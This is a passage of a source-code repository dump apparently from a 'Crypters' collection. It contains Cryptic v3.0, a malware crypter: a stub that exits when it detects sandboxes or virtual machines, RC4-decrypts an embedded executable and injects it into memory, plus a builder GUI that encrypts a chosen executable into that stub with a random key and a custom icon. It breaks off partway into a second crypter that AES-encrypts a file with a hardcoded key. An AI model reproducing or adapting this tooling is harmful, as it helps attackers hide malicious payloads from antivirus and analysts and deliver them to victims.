221 | INT a, b = 0, s[256];
222 | BYTE swap;
223 | DWORD dwCount;
224 | for(a = 0; a < 256; a++)
225 | {
226 | s[a] = a;
227 | }
228 | for(a = 0; a < 256; a++)
229 | {
230 | b = (b + s[a] + lpKey[a % dwKeyLen]) % 256;
231 | swap = s[a];
232 | s[a] = s[b];
233 | s[b] = swap;
234 | }
235 | for(dwCount = 0; dwCount < dwBufLen; dwCount++)
236 | {
237 | a = (a + 1) % 256;
238 | b = (b + s[a]) % 256;
239 | swap = s[a];
240 | s[a] = s[b];
241 | s[b] = swap;
242 | lpBuf[dwCount] ^= s[(s[a] + s[b]) % 256];
243 | }
244 | return lpBuf;
245 | }
246 |
247 | int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
248 | {
249 | HANDLE hMutex;
250 | hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "m_Stub");
251 | if(hMutex == NULL)
252 | {
253 | hMutex = CreateMutex(NULL, FALSE, "m_Stub");
254 | }
255 | else
256 | {
257 | return 0;
258 | }
259 | // anti-anubis ->
260 | if(IsAnubis())
261 | {
262 | return 0;
263 | }
264 | // <- anti-anubis
265 | // anti-normansandbox ->
266 | if(IsNormanSandBox())
267 | {
268 | return 0;
269 | }
270 | // <- anti-normansandbox
271 | // anti-sunbeltsandbox ->
272 | if(IsSunbeltSandBox())
273 | {
274 | return 0;
275 | }
276 | // <- anti-sunbeltsandbox
277 | // anti-virtualpc ->
278 | if(IsVirtualPC())
279 | {
280 | return 0;
281 | }
282 | // <- anti-virtualpc
283 | // anti-vmware ->
284 | if(IsVMware())
285 | {
286 | return 0;
287 | }
288 | // <- anti-vmware
289 | CHAR szFileName[MAX_PATH];
290 | GetModuleFileName(NULL, szFileName, MAX_PATH);
291 | HRSRC hRsrc;
292 | hRsrc = FindResource(NULL, MAKEINTRESOURCE(150), RT_RCDATA);
293 | if(hRsrc == NULL)
294 | {
295 | return 0;
296 | }
297 | DWORD dwFileSize;
298 | dwFileSize = SizeofResource(NULL, hRsrc);
299 | HGLOBAL hGlob;
300 | hGlob = LoadResource(NULL, hRsrc);
301 | if(hGlob == NULL)
302 | {
303 | return 0;
304 | }
305 | LPBYTE lpFile;
306 | lpFile = (LPBYTE)LockResource(hGlob);
307 | if(lpFile == NULL)
308 | {
309 | return 0;
310 | }
311 | hRsrc = FindResource(NULL, MAKEINTRESOURCE(151), RT_RCDATA);
312 | if(hRsrc == NULL)
313 | {
314 | return 0;
315 | }
316 | DWORD dwKeySize;
317 | dwKeySize = SizeofResource(NULL, hRsrc);
318 | hGlob = LoadResource(NULL, hRsrc);
319 | if(hGlob == NULL)
320 | {
321 | return 0;
322 | }
323 | LPBYTE lpKey;
324 | lpKey = (LPBYTE)LockResource(hGlob);
325 | if(lpKey == NULL)
326 | {
327 | return 0;
328 | }
329 | InjectPE(szFileName, RC4(&lpFile[0], &lpKey[0], dwFileSize, dwKeySize));
330 | return 0;
331 | }
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by stub.rc
4 | //
5 |
6 | // Next default values for new objects
7 | //
8 | #ifdef APSTUDIO_INVOKED
9 | #ifndef APSTUDIO_READONLY_SYMBOLS
10 | #define _APS_NEXT_RESOURCE_VALUE 101
11 | #define _APS_NEXT_COMMAND_VALUE 40001
12 | #define _APS_NEXT_CONTROL_VALUE 1000
13 | #define _APS_NEXT_SYMED_VALUE 101
14 | #endif
15 | #endif
16 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/stub.rc:
--------------------------------------------------------------------------------
1 | //Microsoft Developer Studio generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "afxres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // Portuguese (Portugal) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_PTG)
19 | #ifdef _WIN32
20 | LANGUAGE LANG_PORTUGUESE, SUBLANG_PORTUGUESE
21 | #pragma code_page(1252)
22 | #endif //_WIN32
23 |
24 | #ifdef APSTUDIO_INVOKED
25 | /////////////////////////////////////////////////////////////////////////////
26 | //
27 | // TEXTINCLUDE
28 | //
29 |
30 | 1 TEXTINCLUDE DISCARDABLE
31 | BEGIN
32 | "resource.h\0"
33 | END
34 |
35 | 2 TEXTINCLUDE DISCARDABLE
36 | BEGIN
37 | "#include ""afxres.h""\r\n"
38 | "\0"
39 | END
40 |
41 | 3 TEXTINCLUDE DISCARDABLE
42 | BEGIN
43 | "\r\n"
44 | "\0"
45 | END
46 |
47 | #endif // APSTUDIO_INVOKED
48 |
49 | #endif // Portuguese (Portugal) resources
50 | /////////////////////////////////////////////////////////////////////////////
51 |
52 |
53 |
54 | #ifndef APSTUDIO_INVOKED
55 | /////////////////////////////////////////////////////////////////////////////
56 | //
57 | // Generated from the TEXTINCLUDE 3 resource.
58 | //
59 |
60 |
61 | /////////////////////////////////////////////////////////////////////////////
62 | #endif // not APSTUDIO_INVOKED
63 |
64 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/XPThemes.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 | Windows Forms Common Control manifest
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/cryptic.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/cryptic.bmp
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/exe.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/exe.ico
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include "resource.h"
7 |
8 | typedef struct _ICONDIRENTRY {
9 | BYTE bWidth;
10 | BYTE bHeight;
11 | BYTE bColorCount;
12 | BYTE bReserved;
13 | WORD wPlanes;
14 | WORD wBitCount;
15 | DWORD dwBytesInRes;
16 | DWORD dwImageOffset;
17 | } ICONDIRENTRY,
18 | * LPICONDIRENTRY;
19 |
20 | typedef struct _ICONDIR {
21 | WORD idReserved;
22 | WORD idType;
23 | WORD idCount;
24 | ICONDIRENTRY idEntries[1];
25 | } ICONDIR,
26 | * LPICONDIR;
27 |
28 | #pragma pack(push)
29 | #pragma pack(2)
30 | typedef struct _GRPICONDIRENTRY {
31 | BYTE bWidth;
32 | BYTE bHeight;
33 | BYTE bColorCount;
34 | BYTE bReserved;
35 | WORD wPlanes;
36 | WORD wBitCount;
37 | DWORD dwBytesInRes;
38 | WORD nID;
39 | } GRPICONDIRENTRY,
40 | * LPGRPICONDIRENTRY;
41 | #pragma pack(pop)
42 |
43 | #pragma pack(push)
44 | #pragma pack(2)
45 | typedef struct _GRPICONDIR {
46 | WORD idReserved;
47 | WORD idType;
48 | WORD idCount;
49 | GRPICONDIRENTRY idEntries[1];
50 | } GRPICONDIR,
51 | * LPGRPICONDIR;
52 | #pragma pack(pop)
53 |
54 | PIMAGE_DOS_HEADER pidh;
55 | PIMAGE_NT_HEADERS pinh;
56 | PIMAGE_SECTION_HEADER pish;
57 |
58 | HINSTANCE hInst;
59 | HICON hIcon;
60 |
61 | DWORD dwFileSize;
62 | LPBYTE lpFileBuffer;
63 |
64 | CHAR szEFileName[MAX_PATH];
65 | CHAR szIFileName[MAX_PATH];
66 |
67 | BOOL LoadPE(LPSTR szFileName)
68 | {
69 | HANDLE hFile = CreateFile(szFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
70 | if(hFile == INVALID_HANDLE_VALUE)
71 | {
72 | return FALSE;
73 | }
74 | dwFileSize = GetFileSize(hFile, NULL);
75 | if(dwFileSize == INVALID_FILE_SIZE)
76 | {
77 | return FALSE;
78 | }
79 | lpFileBuffer = (LPBYTE)realloc(lpFileBuffer, dwFileSize);
80 | if(lpFileBuffer == NULL)
81 | {
82 | return FALSE;
83 | }
84 | DWORD dwBytesRead;
85 | ReadFile(hFile, lpFileBuffer, dwFileSize, &dwBytesRead, NULL);
86 | CloseHandle(hFile);
87 | pidh = (PIMAGE_DOS_HEADER)&lpFileBuffer[0];
88 | if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
89 | {
90 | free(lpFileBuffer);
91 | return FALSE;
92 | }
93 | pinh = (PIMAGE_NT_HEADERS)&lpFileBuffer[pidh->e_lfanew];
94 | if(pinh->Signature != IMAGE_NT_SIGNATURE)
95 | {
96 | free(lpFileBuffer);
97 | return FALSE;
98 | }
99 | return TRUE;
100 | }
101 |
102 | BOOL AddIcon(LPSTR szIFileName, LPSTR szEFileName)
103 | {
104 | HANDLE hFile = CreateFile(szIFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
105 | if(hFile == INVALID_HANDLE_VALUE)
106 | {
107 | return FALSE;
108 | }
109 | LPICONDIR lpid;
110 | lpid = (LPICONDIR)malloc(sizeof(ICONDIR));
111 | if(lpid == NULL)
112 | {
113 | return FALSE;
114 | }
115 | DWORD dwBytesRead;
116 | ReadFile(hFile, &lpid->idReserved, sizeof(WORD), &dwBytesRead, NULL);
117 | ReadFile(hFile, &lpid->idType, sizeof(WORD), &dwBytesRead, NULL);
118 | ReadFile(hFile, &lpid->idCount, sizeof(WORD), &dwBytesRead, NULL);
119 | lpid = (LPICONDIR)realloc(lpid, (sizeof(WORD) * 3) + (sizeof(ICONDIRENTRY) * lpid->idCount));
120 | if(lpid == NULL)
121 | {
122 | return FALSE;
123 | }
124 | ReadFile(hFile, &lpid->idEntries[0], sizeof(ICONDIRENTRY) * lpid->idCount, &dwBytesRead, NULL);
125 | LPGRPICONDIR lpgid;
126 | lpgid = (LPGRPICONDIR)malloc(sizeof(GRPICONDIR));
127 | if(lpgid == NULL)
128 | {
129 | return FALSE;
130 | }
131 | lpgid->idReserved = lpid->idReserved;
132 | lpgid->idType = lpid->idType;
133 | lpgid->idCount = lpid->idCount;
134 | lpgid = (LPGRPICONDIR)realloc(lpgid, (sizeof(WORD) * 3) + (sizeof(GRPICONDIRENTRY) * lpgid->idCount));
135 | if(lpgid == NULL)
136 | {
137 | return FALSE;
138 | }
139 | for(int i = 0; i < lpgid->idCount; i++)
140 | {
141 | lpgid->idEntries[i].bWidth = lpid->idEntries[i].bWidth;
142 | lpgid->idEntries[i].bHeight = lpid->idEntries[i].bHeight;
143 | lpgid->idEntries[i].bColorCount = lpid->idEntries[i].bColorCount;
144 | lpgid->idEntries[i].bReserved = lpid->idEntries[i].bReserved;
145 | lpgid->idEntries[i].wPlanes = lpid->idEntries[i].wPlanes;
146 | lpgid->idEntries[i].wBitCount = lpid->idEntries[i].wBitCount;
147 | lpgid->idEntries[i].dwBytesInRes = lpid->idEntries[i].dwBytesInRes;
148 | lpgid->idEntries[i].nID = i + 1;
149 | }
150 | HANDLE hUpdate;
151 | hUpdate = BeginUpdateResource(szEFileName, TRUE);
152 | if(hUpdate == NULL)
153 | {
154 | CloseHandle(hFile);
155 | return FALSE;
156 | }
157 | for(i = 0; i < lpid->idCount; i++)
158 | {
159 | LPBYTE lpBuffer = (LPBYTE)malloc(lpid->idEntries[i].dwBytesInRes);
160 | if(lpBuffer == NULL)
161 | {
162 | CloseHandle(hFile);
163 | return FALSE;
164 | }
165 | SetFilePointer(hFile, lpid->idEntries[i].dwImageOffset, NULL, FILE_BEGIN);
166 | ReadFile(hFile, lpBuffer, lpid->idEntries[i].dwBytesInRes, &dwBytesRead, NULL);
167 | if(UpdateResource(hUpdate, RT_ICON, MAKEINTRESOURCE(lpgid->idEntries[i].nID), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), &lpBuffer[0], lpid->idEntries[i].dwBytesInRes) == FALSE)
168 | {
169 | CloseHandle(hFile);
170 | free(lpBuffer);
171 | return FALSE;
172 | }
173 | free(lpBuffer);
174 | }
175 | CloseHandle(hFile);
176 | if(UpdateResource(hUpdate, RT_GROUP_ICON, MAKEINTRESOURCE(1), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), &lpgid[0], (sizeof(WORD) * 3) + (sizeof(GRPICONDIRENTRY) * lpgid->idCount)) == FALSE)
177 | {
178 | return FALSE;
179 | }
180 | if(EndUpdateResource(hUpdate, FALSE) == FALSE)
181 | {
182 | return FALSE;
183 | }
184 | return TRUE;
185 | }
186 |
187 | LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
188 | {
189 | int a, b = 0, s[256];
190 | BYTE swap;
191 | DWORD dwCount;
192 | for(a = 0; a < 256; a++)
193 | {
194 | s[a] = a;
195 | }
196 | for(a = 0; a < 256; a++)
197 | {
198 | b = (b + s[a] + lpKey[a % dwKeyLen]) % 256;
199 | swap = s[a];
200 | s[a] = s[b];
201 | s[b] = swap;
202 | }
203 | for(dwCount = 0; dwCount < dwBufLen; dwCount++)
204 | {
205 | a = (a + 1) % 256;
206 | b = (b + s[a]) % 256;
207 | swap = s[a];
208 | s[a] = s[b];
209 | s[b] = swap;
210 | lpBuf[dwCount] ^= s[(s[a] + s[b]) % 256];
211 | }
212 | return lpBuf;
213 | }
214 |
215 | VOID EnableControls(HWND hWnd, BOOL bEnable)
216 | {
217 | EnableWindow(GetDlgItem(hWnd, IDC_FILE), bEnable);
218 | EnableWindow(GetDlgItem(hWnd, IDC_BROWSE), bEnable);
219 | EnableWindow(GetDlgItem(hWnd, IDC_BACKUP), bEnable);
220 | EnableWindow(GetDlgItem(hWnd, IDC_ADDICON), bEnable);
221 | EnableWindow(GetDlgItem(hWnd, IDC_ICONIMG), bEnable);
222 | EnableWindow(GetDlgItem(hWnd, IDC_BUILD), bEnable);
223 | EnableWindow(GetDlgItem(hWnd, IDC_ABOUT), bEnable);
224 | EnableWindow(GetDlgItem(hWnd, IDC_EXIT), bEnable);
225 | }
226 |
227 | BOOL CALLBACK DlgProc(HWND hDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
228 | {
229 | OPENFILENAME ofn;
230 | POINT pt;
231 | RECT rect;
232 | switch(uMsg){
233 | case WM_INITDIALOG:
234 | InitCommonControls();
235 | hIcon = LoadIcon(hInst, MAKEINTRESOURCE(IDI_MAIN));
236 | SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
237 | CheckDlgButton(hDlg, IDC_BACKUP, BST_CHECKED);
238 | SendMessage(GetDlgItem(hDlg, IDC_FILE), EM_SETREADONLY, (WPARAM)TRUE, (LPARAM)0);
239 | hIcon = LoadIcon(hInst, MAKEINTRESOURCE(IDI_EXE));
240 | SendMessage(GetDlgItem(hDlg, IDC_ICONIMG), STM_SETICON, (WPARAM)hIcon, (LPARAM)0);
241 | EnableWindow(GetDlgItem(hDlg, IDC_BUILD), FALSE);
242 | SetWindowPos(hDlg, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE);
243 | break;
244 | case WM_CLOSE:
245 | EndDialog(hDlg, 0);
246 | break;
247 | case WM_PAINT:
248 | SendMessage(GetDlgItem(hDlg, IDC_ICONIMG), STM_SETICON, (WPARAM)hIcon, (LPARAM)0);
249 | break;
250 | case WM_DROPFILES:
251 | HDROP hDrop;
252 | hDrop = HDROP(wParam);
253 | DragQueryFile(hDrop, 0, szEFileName, sizeof(szEFileName));
254 | DragFinish(hDrop);
255 | if(LoadPE(szEFileName) == FALSE)
256 | {
257 | MessageBox(hDlg, "Could not load file!", "Cryptic", MB_ICONERROR);
258 | return TRUE;
259 | }
260 | SetDlgItemText(hDlg, IDC_FILE, szEFileName);
261 | EnableWindow(GetDlgItem(hDlg, IDC_BUILD), TRUE);
262 | break;
263 | case WM_MOUSEMOVE:
264 | GetCursorPos(&pt);
265 | GetWindowRect(GetDlgItem(hDlg, IDC_ICONIMG), &rect);
266 | if(PtInRect(&rect, pt))
267 | {
268 | SetCursor(LoadCursor(NULL, MAKEINTRESOURCE(32649)));
269 | }
270 | else
271 | {
272 | SetCursor(LoadCursor(NULL, IDC_ARROW));
273 | }
274 | break;
275 | case WM_LBUTTONDOWN:
276 | GetCursorPos(&pt);
277 | GetWindowRect(GetDlgItem(hDlg, IDC_ICONIMG), &rect);
278 | if(PtInRect(&rect, pt))
279 | {
280 | SetCursor(LoadCursor(NULL, MAKEINTRESOURCE(32649)));
281 | memset(&ofn, 0, sizeof(ofn));
282 | szIFileName[0] = '\0';
283 | ofn.lStructSize = sizeof(OPENFILENAME);
284 | ofn.hwndOwner = hDlg;
285 | ofn.lpstrFilter = "Icon Files (*.ico)\0*.ico\0\0";
286 | ofn.lpstrFile = szIFileName;
287 | ofn.nMaxFile = MAX_PATH;
288 | ofn.Flags = OFN_PATHMUSTEXIST;
289 | if(GetOpenFileName(&ofn))
290 | {
291 | hIcon = ExtractIcon(hInst, szIFileName, 0);
292 | SendMessage(GetDlgItem(hDlg, IDC_ICONIMG), STM_SETICON, (WPARAM)hIcon, (LPARAM)0);
293 | }
294 | }
295 | break;
296 | case WM_RBUTTONDOWN:
297 | GetCursorPos(&pt);
298 | GetWindowRect(GetDlgItem(hDlg, IDC_ICONIMG), &rect);
299 | if(PtInRect(&rect, pt))
300 | {
301 | SetCursor(LoadCursor(NULL, MAKEINTRESOURCE(32649)));
302 | }
303 | break;
304 | case WM_COMMAND:
305 | switch LOWORD(wParam){
306 | case IDC_BROWSE:
307 | memset(&ofn, 0, sizeof(ofn));
308 | szEFileName[0] = '\0';
309 | ofn.lStructSize = sizeof(OPENFILENAME);
310 | ofn.hwndOwner = hDlg;
311 | ofn.lpstrFilter = "Executable Files (*.exe)\0*.exe\0\0";
312 | ofn.lpstrFile = szEFileName;
313 | ofn.nMaxFile = MAX_PATH;
314 | ofn.Flags = OFN_PATHMUSTEXIST;
315 | if(GetOpenFileName(&ofn))
316 | {
317 | if(LoadPE(szEFileName) == FALSE)
318 | {
319 | MessageBox(hDlg, "Could not load file!", "Cryptic", MB_ICONERROR);
320 | return TRUE;
321 | }
322 | SetDlgItemText(hDlg, IDC_FILE, szEFileName);
323 | EnableWindow(GetDlgItem(hDlg, IDC_BUILD), TRUE);
324 | }
325 | break;
326 | case IDC_BUILD:
327 | EnableControls(hDlg, FALSE);
328 | HRSRC hRsrc;
329 | hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_STUB), "STUB");
330 | if(hRsrc == NULL)
331 | {
332 | MessageBox(hDlg, "Could not find resource!", "Cryptic", MB_ICONERROR);
333 | EnableControls(hDlg, TRUE);
334 | return TRUE;
335 | }
336 | DWORD dwRsrcSize;
337 | dwRsrcSize = SizeofResource(NULL, hRsrc);
338 | HGLOBAL hGlob;
339 | hGlob = LoadResource(NULL, hRsrc);
340 | if(hGlob == NULL)
341 | {
342 | MessageBox(hDlg, "Could not load resource!", "Cryptic", MB_ICONERROR);
343 | EnableControls(hDlg, TRUE);
344 | return TRUE;
345 | }
346 | LPBYTE lpBuffer;
347 | lpBuffer = (LPBYTE)LockResource(hGlob);
348 | if(lpBuffer == NULL)
349 | {
350 | MessageBox(hDlg, "Could not lock resource!", "Cryptic", MB_ICONERROR);
351 | EnableControls(hDlg, TRUE);
352 | return TRUE;
353 | }
354 | GetDlgItemText(hDlg, IDC_FILE, szEFileName, MAX_PATH);
355 | if(IsDlgButtonChecked(hDlg, IDC_BACKUP) == BST_CHECKED)
356 | {
357 | CHAR szBFileName[MAX_PATH];
358 | GetDlgItemText(hDlg, IDC_FILE, szBFileName, MAX_PATH);
359 | strcat(szBFileName, ".bak");
360 | if(CopyFile(szEFileName, szBFileName, FALSE) == 0)
361 | {
362 | free(lpBuffer);
363 | MessageBox(hDlg, "Could not copy file!", "Cryptic", MB_ICONERROR);
364 | EnableControls(hDlg, TRUE);
365 | return TRUE;
366 | }
367 | }
368 | BYTE lpKey[14];
369 | srand(time(NULL));
370 | int i;
371 | for(i = 0; i < 15; i++)
372 | {
373 | lpKey[i] = BYTE(rand() % 255 + 1);
374 | }
375 | HANDLE hFile;
376 | hFile = CreateFile(szEFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
377 | if(hFile == INVALID_HANDLE_VALUE)
378 | {
379 | free(lpBuffer);
380 | MessageBox(hDlg, "Could not create file!", "Cryptic", MB_ICONERROR);
381 | EnableControls(hDlg, TRUE);
382 | return TRUE;
383 | }
384 | DWORD dwBytesWritten;
385 | if(WriteFile(hFile, lpBuffer, dwRsrcSize, &dwBytesWritten, NULL) == 0)
386 | {
387 | CloseHandle(hFile);
388 | free(lpBuffer);
389 | MessageBox(hDlg, "Could not write to file!", "Cryptic", MB_ICONERROR);
390 | EnableControls(hDlg, TRUE);
391 | return TRUE;
392 | }
393 | CloseHandle(hFile);
394 | free(lpBuffer);
395 | if(IsDlgButtonChecked(hDlg, IDC_ADDICON) == BST_CHECKED)
396 | {
397 | if(AddIcon(szIFileName, szEFileName) == FALSE)
398 | {
399 | MessageBox(hDlg, "Could add icon!", "Cryptic", MB_ICONERROR);
400 | EnableControls(hDlg, TRUE);
401 | return TRUE;
402 | }
403 | }
404 | HANDLE hUpdate;
405 | hUpdate = BeginUpdateResource(szEFileName, FALSE);
406 | if(hUpdate == NULL)
407 | {
408 | MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
409 | EnableControls(hDlg, TRUE);
410 | return TRUE;
411 | }
412 | if(UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(150), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), RC4(lpFileBuffer, lpKey, dwFileSize, 15), dwFileSize) == FALSE)
413 | {
414 | MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
415 | EnableControls(hDlg, TRUE);
416 | return TRUE;
417 | }
418 | if(UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(151), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), &lpKey[0], 15) == FALSE)
419 | {
420 | MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
421 | EnableControls(hDlg, TRUE);
422 | return TRUE;
423 | }
424 | if(EndUpdateResource(hUpdate, FALSE) == FALSE)
425 | {
426 | MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
427 | EnableControls(hDlg, TRUE);
428 | return TRUE;
429 | }
430 | RC4(lpFileBuffer, lpKey, dwFileSize, 15);
431 | pish = (PIMAGE_SECTION_HEADER)&lpFileBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * (pinh->FileHeader.NumberOfSections - 1)];
432 | if(dwFileSize > (pish->PointerToRawData + pish->SizeOfRawData))
433 | {
434 | MessageBox(hDlg, "EOF data found!", "Cryptic", MB_OK);
435 | hFile = CreateFile(szEFileName, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
436 | if(hFile == INVALID_HANDLE_VALUE)
437 | {
438 | MessageBox(hDlg, "Could not open file!", "Cryptic", MB_ICONERROR);
439 | EnableControls(hDlg, TRUE);
440 | return TRUE;
441 | }
442 | SetFilePointer(hFile, 0, NULL, FILE_END);
443 | if(WriteFile(hFile, &lpFileBuffer[pish->PointerToRawData + pish->SizeOfRawData + 1], dwFileSize - (pish->PointerToRawData + pish->SizeOfRawData), &dwBytesWritten, NULL) == 0)
444 | {
445 | CloseHandle(hFile);
446 | MessageBox(hDlg, "Could not write to file!", "Cryptic", MB_ICONERROR);
447 | EnableControls(hDlg, TRUE);
448 | return TRUE;
449 | }
450 | CloseHandle(hFile);
451 | }
452 | MessageBox(hDlg, "File successfully crypted!", "Cryptic", MB_ICONINFORMATION);
453 | EnableControls(hDlg, TRUE);
454 | break;
455 | case IDC_ABOUT:
456 | MessageBox(hDlg, "Cryptic v3.0\nCoded by Tughack", "About", MB_ICONINFORMATION);
457 | break;
458 | case IDC_EXIT:
459 | EndDialog(hDlg, 0);
460 | break;
461 | }
462 | }
463 | return FALSE;
464 | }
465 |
466 | int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
467 | {
468 | HANDLE hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "m_Cryptic");
469 | if(hMutex == NULL)
470 | {
471 | hMutex = CreateMutex(NULL, FALSE, "m_Cryptic");
472 | }
473 | else
474 | {
475 | return 0;
476 | }
477 | hInst = hInstance;
478 | DialogBox(hInst, MAKEINTRESOURCE(IDD_MAIN), NULL, (DLGPROC)DlgProc);
479 | return 0;
480 | }
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by Cryptic.rc
4 | //
5 | #define IDR_24 1
6 | #define IDD_MAIN 101
7 | #define IDB_MAIN 102
8 | #define IDI_MAIN 103
9 | #define IDI_EXE 104
10 | #define IDR_STUB 105
11 | #define IDC_FILE 1000
12 | #define IDC_BROWSE 1001
13 | #define IDC_BACKUP 1002
14 | #define IDC_ADDICON 1003
15 | #define IDC_BUILD 1004
16 | #define IDC_ABOUT 1005
17 | #define IDC_EXIT 1006
18 | #define IDC_ICONIMG 1007
19 |
20 | // Next default values for new objects
21 | //
22 | #ifdef APSTUDIO_INVOKED
23 | #ifndef APSTUDIO_READONLY_SYMBOLS
24 | #define _APS_NEXT_RESOURCE_VALUE 106
25 | #define _APS_NEXT_COMMAND_VALUE 40001
26 | #define _APS_NEXT_CONTROL_VALUE 1008
27 | #define _APS_NEXT_SYMED_VALUE 101
28 | #endif
29 | #endif
30 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/skull.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/skull.ico
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual C++ Express 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MyEncrypter", "MyEncrypter\MyEncrypter.vcxproj", "{06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Debug|Win32.Build.0 = Debug|Win32
14 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Release|Win32.ActiveCfg = Release|Win32
15 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter.suo
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 | #include
4 | #include "aes256.h"
5 |
6 | int main (int argc, char *argv[])
7 | {
8 | if (argv[1] == NULL) return 0;
9 |
10 | //*********** open file to encrypt ************
11 | FILE *inFile = fopen(argv[1], "rb");
12 | fseek(inFile , 0 , SEEK_END);
13 | unsigned long lSize = ftell(inFile);
14 | rewind(inFile);
15 | unsigned char *text = (unsigned char*) malloc (sizeof(unsigned char)*lSize);
16 | fread(text,1,lSize,inFile);
17 | fclose (inFile);
18 | //*********************************************
19 |
20 | puts("Encrypting...");
21 |
22 | //************ AES encryption ********************
23 | unsigned char aesKey[32] = {
24 | 0x53, 0x28, 0x40, 0x6e, 0x2f, 0x64, 0x63, 0x5d, 0x2d, 0x61, 0x77, 0x40, 0x76, 0x71, 0x77, 0x28,
25 | 0x74, 0x61, 0x7d, 0x66, 0x61, 0x73, 0x3b, 0x5d, 0x66, 0x6d, 0x3c, 0x3f, 0x7b, 0x66, 0x72, 0x36
26 | };
27 |
28 | unsigned char *buf;
29 |
30 | aes256_context ctx;
31 | aes256_init(&ctx, aesKey);
32 |
33 | for (unsigned long i = 0; i < lSize/16; i++) {
34 | buf = text + (i * 16);
